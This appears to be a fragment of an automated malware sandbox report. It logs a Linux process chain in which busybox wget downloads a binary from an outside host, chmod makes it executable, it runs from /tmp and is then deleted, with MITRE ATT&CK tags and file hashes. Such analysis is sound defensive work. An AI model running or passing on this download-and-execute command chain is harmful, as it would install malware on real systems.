/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- System Network Configuration Discovery
PID:1000
-
-
/bin/chmodchmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- File and Directory Permissions Modification
PID:1001
-
-
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Executes dropped EXE
PID:1002
-
-
/bin/rmrm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:1003
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97